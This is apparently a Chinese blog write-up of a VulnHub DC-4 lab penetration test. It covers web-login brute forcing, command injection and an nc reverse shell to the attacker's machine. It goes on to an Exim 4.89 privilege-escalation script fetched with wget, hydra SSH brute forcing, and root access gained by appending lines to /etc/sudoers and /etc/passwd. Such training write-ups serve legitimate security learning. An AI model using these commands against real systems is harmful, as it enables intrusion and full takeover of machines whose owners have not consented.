Vulnhub_DC-4靶机渗透测试

DC-4

DC: 4 ~ VulnHub

信息收集

  1. 使用nmap扫描出靶机所处192.168.78.153网段 再扫描一下细致的内容,发现开放80网站和22 ssh端口。感觉多半要获取用户名和密码来进行ssh连接了

image-20230621210512417

web渗透

  1. 访问网站,是一个登录窗,根据标题给出admin提示,感觉用户名就是admin了,查看了一圈没有什么提示,看来多半要爆破密码了

image-20230621220952680

  1. 由web 1靶机给出的经验,再使用dirb扫描一下,很好,直接进行爆破
image-20230621221118833
  1. 输入参数提交抓包,发送到攻击模块,加载弱密码文件,进行爆破,得出密码为happy
image-20230621221213234
  1. 登录之后,发现有几个功能,执行了之后发现都是Linux系统命令,没有能输入命令的地方,灵机一动抓包会不会显示命令执行语句呢
image-20230621221334273

漏洞利用

  1. 正如所料,还真能抓包查看到执行命令,那就开始修改命令查看是否可行 传入id发现成功返回 出现了rce命令执行漏洞

image-20230621221428298

  1. 既然能直接执行系统命令,那就直接使用 nc 将当前web用户的shell反弹到虚拟机上,输入nc -e /binbash 192.168.78.145 7777

image-20230621221608398

image-20230621221623857

  1. 当然第一反应也想到写入一个木马文件,但尝试发现失败了,在kali里面尝试写入,发现参数没有了。在burp写入连文件都没有创建,可能权限不够吧

image-20230621221745449

image-20230621221750143

漏洞利用 获取shell

  1. 将反弹的shell转换成交互式shell python -c 'import pty; pty.spawn("/bin/bash")'
  2. 先来到home文件下,查看有没有什么文件可以查看

image-20230621221919392

  1. 查看一下etc/passwd,发现一共有三个用户为1000以上的,看来少不了ssh切换用户了

image-20230622162133655

  1. 查看了一圈文件发现jim文件夹内有一个备份的密码

image-20230621222102998

提升权限 1

  1. 使用find命令查找suid提权find / -user root -perm -4000 -print 2>/dev/null 发现了一个exim4,之前有用过这个提权,查看一下版本为

image-20230622161822835

  1. 查看版本为4.89,似乎正好可以进行本地提权的漏洞版本之间的

image-20230622162159874

  1. searchsploit exim查找可利用的提权POC 找到目标

image-20230622162344092

  1. 将脚本保存到桌面 cp /usr/share/exploitdb/exploits/linux/local/46996.sh 1.sh

image-20230622162719986

  1. 查看POC的文件尾格式,发现依旧是windows版本,修改成Linux版本

image-20230622162857945

  1. 将脚本文件导入到/var/www/html中,使用wget下载提权脚本到目标机中
启动阿帕奇服务  sudo service apache2 start
cp 1.sh /var/www/html/1.sh
chmod 777 1.sh
wget http://192.168.78.128/1.sh

image-20230622164555598

  1. 执行脚本提权查看

image-20230622164717019

  1. 查看flag文件

image-20230622164739386

权限提升2

  1. 既然已经有了密码文件,用户名肯定也就是home文件夹下的那几个了,使用hydra进行ssh爆破 hydra.exe -L user.txt -P DC-4pass.txt ssh://192.168.78.153 jim : jibril04

image-20230621222307273

image-20230621222301055

  1. 使用ssh登录到 jim用户

image-20230621222429432

  1. 查看了一圈没有什么可以查看的内容,也没有查找到其他用户的密码grep -rns charles ,查看wp发现了需要去查看/etc/mail 可以查看到 charles 用户发送给jim的密码

image-20230621222711580

  1. 据了解,jim用户有权利访问mbox文件,查看文件内容发现是一个邮件信息,所以转念去想/etc/mail邮件信息。而且mbox也是邮件信息的一种格式

image-20230622155002203

  1. 登录账户ssh charles@192.168.78.153 密码:^xHhA&hvim0y

image-20230621222753146

  1. 使用suid -l 查看当前用户具有的权限 发现可以不需要密码就能使用root权限去执行 /usr/bin/teehee

image-20230621223024678

  1. 查看teehee的使用方法,发现 -a参数可以将内容写入到一个文件中,而且不会覆盖,这就难免要想到DC-9靶机可以写入/etc/passwd账号密码,也可以写入/etc/sudoers 另账号具有所有的root权限

image-20230622155114052

  1. 所以现在就进行将charles用户 提升为具有root权限 charles ALL=(ALL:ALL) ALL payloadecho "charles ALL=(ALL:ALL) ALL" | sudo teehee -a /etc/sudoers

image-20230622155542535

image-20230622161528121

  1. sudo -l 发现用户确实有了root权限。直接使用 sudo su来提升为root权限,输入密码即可

image-20230622161624689

  1. 获取flag

image-20230622161640490

总结

本次的DC-4靶机感觉难度挺简单,至少是第一次直接从靶机打到了提权部分,没看wp,因为exim4漏洞POC有使用过,直接提权上到root。在进行常规提权的时候查看了一下邮件信息的文件 找到了隐藏密码

  1. 暴力破解登录网站
  2. shell命令执行直接反弹shell到kali上
  3. find 发现exim4提权POC suid提权
  4. wget 下载虚拟机网站的文件 无法上传文件到目标机上
  5. hydra对ssh登录爆破
  6. mbox邮件格式文件 /etc/mail 保存邮件信息
  7. 使用 --help查看teehee的用法
  8. 可以随意写入文件,可以尝试写入新账户root权限到/etc/passwd 可以将当前账号赋予所有的root权限 /etc/sudoers
echo 'hacker:$1$hacker$6luIRwdGpBvXdP.GMwcZp/:0:0::/root:/bin/bash' >> /etc/passwd
echo "charles ALL=(ALL:ALL) ALL" | sudo teehee -a /etc/sudoers
``
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值